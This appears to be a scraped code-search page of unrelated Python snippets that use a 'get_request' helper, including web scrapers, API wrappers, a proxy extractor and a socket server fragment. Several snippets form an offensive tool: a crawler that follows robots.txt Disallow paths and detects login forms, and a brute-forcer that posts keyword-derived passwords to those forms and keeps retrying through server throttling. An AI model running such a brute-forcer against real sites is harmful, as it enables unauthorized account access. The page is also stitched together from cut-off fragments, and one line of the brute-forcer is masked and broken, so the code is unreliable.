def get_coords_string_from_url(input_string):
    response = get_request(input_string)
    response.raise_for_status()
    coordinate_strings = COORDS_FROM_URL_REGEX.search(response.text)
    if coordinate_strings is None:
        raise ValueError
    return coordinate_strings.group()
def get_constituency_results(page_url, year, parties=None):
    """
    This method is the main constituency results scraper.
    The constituency page url and election year must be provided.
    A list of dictionaries containing candiate names, parties, and vote tallies is returned.
    """

    # Get page as soup
    request = get_request(page_url)
    request.raise_for_status()
    soup = Soup(request.text, 'html.parser')

    # Find results table
    election_table = False
    tables = soup.find_all('caption')
    for table in tables:
        if re.match('General [Ee]lection {}'.format(year),
                    table.find('a').contents[0]):
            election_table = table.parent
            break

    # Try alternative scraper
    if not election_table:
        return alternative_constituency_results(soup, year, parties)

    # Process results table
    candidates = []
    for candidate in election_table.findChildren('tr', class_='vcard'):

        # Add candidate to list
        candidates.append(get_candidate_from_row(candidate, 3, parties))

    # Return candidates
    return candidates
def _get_largest_timeoverlap_subfolder(url, expected_folder, offset=9):
    # gets best matching subfolder based on differences of start- and endtimes
    # offset determines the start of a %H%M_%H%M pattern that determines start and endtime
    # default (9) is for standard pattern yyyymmdd_HHMM_HHMM
    f = get_request(url)
    soup = BeautifulSoup(f.text, 'html.parser')

    best_match = ''
    best_overlap = 0
    exp_start = datetime.strptime(expected_folder[offset:offset + 4], "%H%M")
    exp_end = datetime.strptime(expected_folder[offset + 5:offset + 9], "%H%M")
    for a in soup.find_all('a'):
        folder = a.get("href")
        if folder[:offset] != expected_folder[:offset]:
            continue

        start_max = max(exp_start,
                        datetime.strptime(folder[offset:offset + 4], "%H%M"))
        end_min = min(exp_end,
                      datetime.strptime(folder[offset + 5:offset + 9], "%H%M"))
        overlap = (end_min - start_max).total_seconds()
        if overlap > best_overlap and overlap > 0:
            best_match = folder
            best_overlap = overlap
    return best_match
Example #4
0
def get_wca_id_from_access_token(access_token):
    """ Returns the user's WCA ID from the /me WCA API endpoint. """

    headers = {"Authorization": "Bearer " + access_token}
    me_data = get_request(__WCA_ME_API_URL, headers=headers).json()

    return me_data['me']['wca_id']
Example #5
0
def crawl_robots(bfs, url, header_dict, counter, forms, keywords, seen):
    # If url doesnt end with /robots.txt or robots.txt/ then append and call, otherwise call just url
    robots_url = ''
    if url.endswith('robots.txt') or url.endswith('robots.txt/'):
        robots_url = url
    else:
        if url.endswith('/'):
            robots_url = url + 'robots.txt'
        else:
            robots_url = url + '/robots.txt'

    try:
        print('\nTrying robots link: {}'.format(robots_url))
        textfile = get_request(robots_url, {})
    except socket.gaierror:
        print('\nCould not find {}'.format(robots_url))
        return
    split_text = textfile.split('\n')
    allow_disallow = list(
        filter(lambda x: x.startswith('Disallow:') or x.startswith('Allow:'),
               split_text))
    new_links = list(map(lambda x: x.split(' ')[1], allow_disallow))
    appended_links = list(map(lambda x: '{}{}'.format(url, x), new_links))
    for link in appended_links:
        if link not in seen:
            try:
                if bfs:
                    crawl_bfs(link, header_dict, counter, forms, keywords,
                              seen)
                else:
                    crawl_dfs(link, header_dict, counter, forms, keywords,
                              seen)
            except socket.gaierror:
                print('\nCould not find {}'.format(link))
Example #6
0
 def validate(self, paper_id):
     url_prefix = self.ARXIV_VALIDATE_URL_PREFIX
     if not paper_id.startswith(url_prefix):
         paper_ref = urljoin(url_prefix, paper_id)
     else:
         paper_ref = paper_id
     r = get_request(paper_ref)
     return (r.status_code == 200)
Example #7
0
def brute_force(user, keywords, forms, user_agent):
    passwords = generate_all_passwords(keywords)
    results = {}
    for form in forms:
        print('\nAttempting to brute-force: ' + form + '\n')
        get_header = {'User-Agent': user_agent}
        html_doc = get_request(form, get_header)
        parser = HTMLParser(html_doc)
        done = False

        for password in passwords:
            if not done:
                login = parser.create_login_string(user, password)
                post = {
                    'User-Agent': user_agent,
                    'Content-Type': 'application/x-www-form-urlencoded',
                    'Content-Length': str(len(login))
                }

                response = post_request(form, post, login)

                if get_status(response) >= 500:
                    print(
                        '\nHold on, too many failed attempts! Waiting for the server to accept more login requests...\n'
                    )

                # Continually retry logging in if there is a server error (too many failed attempts)
                while get_status(response) >= 500:
                    response = post_request(form, post, login)

                combination = 'User: '******'\nPassword: '******'Attempting to login...\n' + combination)

                if get_status(response) == 302:
                    print('Login Succeeded!\n')
                    done = True
                    results[form] = combination
                else:
                    print('Login Failed...\n')

        if not done:
            print('Ran out of passwords! Bruteforce failed!')
            results[form] = None

        sleep(
            5
        )  # Temporary pause between forms to see end result of the current form

    # Print bruteforce results
    print('Bruteforcer Results')
    print('-' * 50)
    for form, combination in results.items():
        print('Form: ' + form)
        if combination is None:
            print('Bruteforce Failed')
        else:
            print(combination)
        print()
Example #8
0
def get_sunrise_sunset_times():
    data = get_request(
        'https://api.sunrise-sunset.org/json?lat=37.983810&lng=23.727539&date=today&formatted=0'
    ).json()['results']

    return {
        'sunset': parse_utc_time_string(data['sunset']),
        'sunrise': parse_utc_time_string(data['sunrise'])
    }
Example #9
0
 def _get(self, path, data={}, key=None, admin=False):
     if not key:
         key = self.api_key if not admin else self.master_api_key
     data = data.copy()
     data['key'] = key
     if path.startswith("/api"):
         path = path[len("/api"):]
     url = "%s/%s" % (self.api_url, path)
     return get_request(url, params=data)
Example #10
0
 def _get( self, path, data={}, key=None, admin=False ):
     if not key:
         key = self.api_key if not admin else self.master_api_key
     data = data.copy()
     data['key'] = key
     if path.startswith("/api"):
         path = path[ len("/api"): ]
     url = "%s/%s" % (self.api_url, path)
     return get_request( url, params=data )
async def get_fresh_data(repository_url: str,
                         excluded: Iterable) -> AsyncIterator[str]:
    """
    Retrieve a fresh batch of data from the repository.

    Parameters
    ----------
    repository_url: str
        URL for the repository (the zip file).

    excluded: Iterable

    Returns
    -------
    AsyncIterator[str]
        An async iterator of relative paths to the file.
    """
    url = BASE_REPOSITORY + repository_url.lstrip(
        processor_settings.URL_SEPARATOR)

    # Requesting the latest files from the repository.
    async with Lock():
        response = get_request(url=url)

        logging.info(f"> Download request completed with "
                     f"status {response.status_code}: {repository_url}")

    if response.status_code != HTTPStatus.OK:
        raise RuntimeError(
            f"Failed to download the data from {url}: {response.text}")

    # `ZipFile` only understands files.
    data_bin = BytesIO(response.content)

    async with Lock():
        with ZipFile(data_bin, mode="r") as zip_obj:
            paths = zip_obj.namelist()

            # Extracting the contents into the temp directory.
            zip_obj.extractall(TEMP_DIR_PATH)
        logging.info("> Successfully extracted and stored the data")

    for path in paths:
        _, filename = split_path(path)

        if any(map(lambda p: p in path, excluded)):
            continue

        full_path = join_path(TEMP_DIR_PATH, path)

        # Discard directories
        if not isfile(full_path):
            continue

        logging.info(f"> Processing file '{path}'")

        yield path
Example #12
0
    def new(cls, url, timeout=5):
        response = get_request(url, timeout=timeout)
        response.raise_for_status()
        text = response.json()

        if not cls.is_unique(text):
            return cls.new(url, timeout)  # someday jokes will end

        return cls(text=text, user=current_user)
Example #13
0
def get_data():
    execution_date = datetime.today().strftime('%Y-%m-%d')
    execution_date_minus_30 = (datetime.strptime(execution_date, '%Y-%m-%d') -
                               timedelta(days=30)).strftime('%Y-%m-%d')
    dates = [(datetime.strptime(execution_date, '%Y-%m-%d') -
              timedelta(days=day)).strftime('%Y-%m-%d') for day in range(30)]
    response: Response = get_request(
        f'{BASE_URL}/{HISTORY_ENDPOINT}?start_at={execution_date_minus_30}&end_at={execution_date}'
    )
    rates: Dict = response.json().get('rates')
    return rates
Example #14
0
 def recovery_flux_url(self,url):
     """
     Arguments:
         url : string containing the url of the rss feed
     Return :
         BeautifulSoup
     """
     req = get_request(url)
     data = req.text
     soup = BeautifulSoup(data, "lxml")
     return(soup)
Example #15
0
def fetch_raw_data(url: str, encoding: str = 'windows-1251') -> Any:
    headers = default_headers()
    headers.update({
        'User-Agent':
        'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'
    })

    req = get_request(url, headers)
    req.encoding = encoding

    return req
Example #16
0
def main():
    audioData = open("audio.txt", "w+")
    monitor = PeakMonitor(SINK_NAME, METER_RATE)
    for sample in monitor:
        sample = sample >> DISPLAY_SCALE
        bar = '>' * sample
        spaces = ' ' * (MAX_SPACES - sample)
        #print ' %3d %s%s\r' % (sample, bar, spaces),
        sys.stdout.flush()
        spectrum = [0] * 6
        for i in range(6):
            try:
                spectrum[i] = (monitor._samples.get(0))
            except:
                pass                              

        rgb = int((float(sum(spectrum))/400.0)  * 100)
        rgb = ('#%02x%02x%02x' % (0,0,rgb))[1:]
        
        print rgb
        get_request('http://192.168.1.13:8081/' + rgb)
Example #17
0
    def _get_html_from_url(url: str) -> str:
        response_body = None

        try:
            response: Response = get_request(url)

            if 200 == response.status_code and str.startswith(response.headers.get('content-type'), 'text/html'):
                if type(response.content) is bytes:
                    response_body = response.content.decode('utf-8')
                else:
                    response_body = response.content
        except RequestException:
            pass

        return response_body
Example #18
0
def extractor(channel_id):
    extractor.proxies_tmp_list = []
    extractor.proxies = {""}

    html = get_request("https://t.me/s/" + channel_id).content
    soup = BeautifulSoup(html)
    links = soup.find_all("a")

    for tag in links:
        proxy = tag.get("href", None)

        if (proxy != None) and ("/proxy?" and "&secret=" and "&port="
                                and "server=" in proxy):
            extractor.proxies.add(proxy)

    extractor.proxies.remove("")
Example #19
0
 def get(self,
         filename: str,
         offset: int = -1,
         maxlen: int = -1,
         headers: dict = None,
         cookies: dict = None):
     if not headers:
         headers = {}
     if not cookies:
         cookies = ()
     response = get_request(filename, headers=headers, cookies=cookies)
     ret = response.text
     if offset > 0:
         ret = ret[offset:]
     if maxlen > 0:
         ret = ret[:maxlen]
     return ret
Example #20
0
def _get_best_matching_subfolder(url,
                                 expected_folder,
                                 filter_func=lambda x: True):
    f = get_request(url)
    soup = BeautifulSoup(f.text, 'html.parser')

    best_match = ''
    best_score = 0
    for a in soup.find_all('a'):
        folder = a.get("href")
        if not filter_func(folder):
            continue

        score = _matching_chars(folder, expected_folder)
        if score > best_score:
            best_match = folder
            best_score = score
    return best_match
def read_limb_flares(flare_list=DEFAULT_LIMB_FLARE_LOCATION):
    # load data
    if os.path.isfile(flare_list):
        with open(flare_list) as tsv:
            lines = tsv.read().split("\n")
    else:
        lines = get_request(flare_list).text.split("\n")

    flares = []
    for line in lines:
        cell = line.split(
            "\t"
        )  # 1, 2002 Mar 07, 17:50:44, C2.5, -961.5, -176.4, 21.4, 11.6, 5.86, 32.0, 10.1, 4.56, -0.4, 0.77, 12,
        if len(cell) > 2 and cell[0].isnumeric() and len(cell[1]) > 4:
            flares.append(
                datetime.strptime(cell[1] + "T" + cell[2],
                                  "%Y %b %dT%H:%M:%S"))

    return flares
Example #22
0
def query_osm_results(query_box={'s': 0, 'n': 0, 'w': 0, 'e': 0}, filter_tag_or_tagval=''):
    ''' Query OSM 'relation' data elements in a given bounding box.
    'relation' elements are used to organize multiple nodes or ways into a larger whole.
    
    Generates an OSM http request and return response in JSON format.
    i.e. 
    http://overpass-api.de/api/interpreter?data=[out:json];node(41.5,-122.0,41.7,-121.6);%3C;out%20meta; '''

    query = "node({s},{w},{n},{e});<;out meta;".format(s=query_box['s'], n=query_box['n'],
                                                       w=query_box['w'], e=query_box['e'])
    url_base = "http://overpass-api.de/api/interpreter?data=[out:json];"
    ''' This call includes:
        - all nodes in the bounding box,
        - all ways that have such a node as member,
        - and all relations that have such a node or such a way as members. '''
    url = url_base + query
    try:
        sleep(0.5)
        req_start_time = time()
        osm_data = get_request(url).json()
        log.info('   Request took %.2f seconds' % (time() - req_start_time))
        if 'elements' in osm_data:
            if filter_tag_or_tagval != '':
                filtered_set = list()
                for itm in osm_data['elements']:
                    if 'tags' in itm:
                        if filter_tag_or_tagval in itm['tags']:
                            filtered_set.append(itm)
                        else:
                            for itag in itm['tags']:
                                if itm['tags'][itag] == filter_tag_or_tagval:
                                    filtered_set.append(itm)
                return filtered_set
            return osm_data['elements']
        else:
            log.warning('no elements found in query_box ' + str(query_box))
            return []
    except ValueError as e:
        log.warning('ValueError for query_box ' + str(query_box) + " | " + str(e))
        return []
Example #23
0
def process_node(start_url, node, header_dict, forms, keywords, seen, add_next,
                 counter):
    if counter.count >= counter.page_max:
        return

    # Make GET request to the current URL
    html_doc = get_request(node.url, header_dict)
    if html_doc is not None:
        print('Depth ' + str(node.depth) + ': Processing: ' + node.url)
        counter.count += 1

        parser = HTMLParser(html_doc)

        # Extract and add words from current page to the set of keywords
        keywords |= parser.extract_words()

        # If a login form is found, add it to the set
        form_found = parser.detect_login_form()
        if form_found:
            forms.add(node.url)

        # Add reachable URLs from current node if its depth < max depth
        if node.depth < counter.max_depth:
            # Retrieve set of URLs reachable from current node
            linked_urls = parser.extract_urls()

            for url in linked_urls:
                # Reformat if relative url given
                if 'http' not in url:
                    url = reformat_url(url, node.url)

                if url not in seen and url.startswith(start_url):
                    seen.add(url)
                    add_duplicate_url(url, seen)
                    # Traversal dependent function to add next node
                    add_next(url)
    else:
        print('4xx/5xx error at: ' + node.url)
Example #24
0
def upload():
    image_found = False
    if request.method == 'POST' and request.files['photo']:
        extension = get_image_extension(request.files['photo'])
        print("IMAGE_STUFF: ", request.files['photo'])

        if extension not in ALLOWED_EXTENSIONS:
            flash(
                f"This image extension (.{extension}) is not supported. Upload {' '.join(ALLOWED_EXTENSIONS)} only.",
                "error")
            print(f"ERROR in upload(): The image extension is not supported.")
            return render_template('index.html', user_image=False)

        image = Image.open(request.files['photo'])
        image_found = True

    elif request.method == 'POST' and request.form['text']:
        link = request.form['text']
        extension = link.split('.')[-1].lower()

        if extension not in ALLOWED_EXTENSIONS:
            flash(f"Image URL must end with .png, .jpg or .jpeg", "error")
            print(
                f"ERROR in upload(): The image URL extension is not supported."
            )
            return redirect('/')

        response = get_request(link)
        image = Image.open(BytesIO(response.content))
        image_found = True

    user_image = None
    if image_found:
        user_image = detect_boxes(image)

    return render_template('index.html', user_image=user_image)
Example #25
0
    cli_parser.add_argument("--test",
                            "-t",
                            help="Send results to stdout",
                            action="store_true")
    cli_parser.add_argument("--simple",
                            "-s",
                            help="Do not gather commute info",
                            action="store_true")

    cli_args = cli_parser.parse_args()

    # sadly, https://ochdatabase.umd.edu/, doesn't have an API, but there is a degree of consistency to search queries and their matching URLs
    # the simplest way forward is to build a search manually and then copy/paste the URL below, as we have done
    url = "https://ochdatabase.umd.edu/housing/price-under+2100"
    page = get_request(url)
    soup = BeautifulSoup(page.content, "html.parser")

    search_results = soup.find(id="expo")
    postings = search_results.find_all(
        "article",
        class_=compile_regex(r"^ocp-property-search property-\d?.*"))

    parsed_posts = []
    for post in postings:
        prop = collect_info(post, cli_args.test)

        if prop is not None:
            parsed_posts.append(prop)

    if not parsed_posts:
Example #26
0
    def resolve_rocket(self, info: ResolveInfo, rocketId):
        response = get_request('{}rockets/{}'.format(spacex_api_url, rocketId))

        return response.json()
Example #27
0
 
 if fd not in self.client_data:
     self.client_data[fd] = ''
 if len(data) == 0:
     self.c_close(fd, 'empty string recv')
     return
 self.client_data[fd] += data
     
 response = ''
 if len(self.client_data[fd]) > 0:
     request = self.client_data[fd]
     request = request.split('\r\n')
     method = request[0].split(' ')
     host = requests.get_host(request[1])
     if method[0] == 'GET':
         response = requests.get_request(method[1], self.hosts[host],self.media)
     elif method[0] not in self.methods:
         response = requests.bad_request()
     elif method[0] in self.methods:
         response = requests.not_implemented()
     else:
         return
     total_sent = 0
     while total_sent < len(response):
         try:   
             sent = self.clients[fd].send(response[total_sent:])
         except socket.error, (value, message):
             if value == errno.EAGAIN or errno.EWOULDBLOCK:
                 continue
             else:
                 self.c_close(fd, 'send')
from requests import get as get_request
from bs4 import BeautifulSoup as Soup
import json
import sys

from UKVotingMethods.wiki_scraper import get_constituency_results

# Get parties list
with open('./data/parties.json', encoding='utf-8') as file:
    parties = json.load(file)

# Get constituency list page
request = get_request(
    'https://en.wikipedia.org/wiki/Results_of_the_United_Kingdom_general_election,_2015_by_parliamentary_constituency'
)
request.raise_for_status()
soup = Soup(request.text, 'html.parser')

# Loop over table rows
constituencies = {}
table = soup.find('table', class_='wikitable')
for row in table.findChildren('tr'):

    # Skip header row
    if row.get('valign'):
        continue

    # Skip bottom rows
    if row.get('class'):
        continue
Example #29
0
def latest_version(user: str, repo: str) -> str:
    from requests import get as get_request
    return get_request(
        f"https://api.github.com/repos/{user}/{repo}/releases/latest").json(
        )["tag_name"]
Example #30
0
async def get_request(url):
    data = requests.get_request(url)
    return url
Example #31
0
File: main.py Project: danydlhm/AIS
from keras.layers import Dense, Concatenate, Flatten
from keras.models import Model
from os.path import join,exists
from os import makedirs
from requests import get as get_request
from src import logger

if __name__ == '__main__':
    logger.info("Start process")
    logger.info("Load definition model")
    model = make_yolov3_model()
    weight_path = join('extras','yolov3.weights')
    if not exists(weight_path):
        makedirs('extras', exist_ok=True)
        url = 'https://pjreddie.com/media/files/yolov3.weights'
        r = get_request(url)
        with open(weight_path, 'wb') as f:
            f.write(r.content)
        del r
    logger.info("Load weights")
    weight_reader = WeightReader(weight_path)
    weight_reader.load_weights(model)
    logger.info("End load weights")
    logger.info("Add new layer for project purpose")
    new_outputs = []
    up_sampling = 4
    for output in model.outputs:
        if up_sampling > 1:
            up_sampled_layer = UpSampling2D(up_sampling)(output)
        else:
            up_sampled_layer = output
Example #32
0
 def resolve_all_launches(self, info: ResolveInfo):
     response = get_request('{}launches/'.format(spacex_api_url))
     return response.json()